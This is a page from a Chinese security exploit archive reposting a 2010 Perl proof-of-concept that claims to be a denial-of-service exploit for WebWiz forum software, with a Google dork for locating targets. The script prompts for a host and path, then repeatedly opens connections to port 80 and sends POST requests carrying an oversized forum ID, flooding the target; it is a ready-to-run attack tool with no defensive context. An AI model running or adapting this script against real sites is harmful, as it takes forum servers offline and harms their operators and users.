首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
WebWiz Denial of Service POC
来源:vfocus.net 作者:barcode 发布时间:2010-09-08  
# Exploit Title: [WebWiz Denial of Service Exploit]
# Date: [06.09.10]
# Author: [BARCOD3]
# Version: [9.69]
# Category:: [PoC]
# Google dork: [inurl:powered by webwiz]
# Tested on: [redhat]

#!/usr/bin/perl

use IO::Socket;

print "\n+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\n";
print "+       WebWiz Denial of service exploit       +\n";
print "+               exploited by barcode                +\n";
print "+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+\n\n";
print "Host |without http://www.| ";
chomp($host = <STDIN>);
print "Path |example. /en or / | ";
chomp($pth = <STDIN>);
{
while($x != 999999)
{
$postit = "forum_topics.asp?FID=1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111";
$lrg = length $postit;
my $sock = new IO::Socket::INET (
PeerAddr => "$host",
PeerPort => "80",
Proto => "tcp",
);
die "\nOffline! - Su lanet yere baglanmaya calisiyoruz. '$host' it May be DoSed\n" unless $sock;

print $sock "POST $pth/viewforum.php HTTP/1.1\n";
print $sock "Host: $host\n";
print $sock "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5\n";
print $sock "Referer: $host\n";
print $sock "Accept-Language: en-us\n";
print $sock "Content-Type: application/x-www-form-urlencoded\n";
print $sock "Accept-Encoding: gzip, deflate\n";
print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\n";
print $sock "Connection: Keep-Alive\n";
print $sock "Cache-Control: no-cache\n";
print $sock "Content-Length: $lrg\n\n";
print $sock "$postit\n";
close($sock);
syswrite STDOUT, "Saldiri basladi... Sakin ol. ";
$x++;
}
}


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Live School Portal Database Di
·Integard Home and Pro v2 Remot
·Internet Download Accelerator
·ASPired2Count File Disclosure
·QQPlayer 2.3.696.400p1(.wav) D
·SeaMonkey DLL Hijacking (dwmap
·ColdUserGroup 1.06 Blind SQL I
·Internet Explorer Dll Hijackin
·ColdCalendar 2.06 SQL Injectio
·Microsoft Office Visio DXF Fil
·Java Bridge v. 5.5 Directory T
·FreeBSD 8.1/7.3 vm.pmap Kernel
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved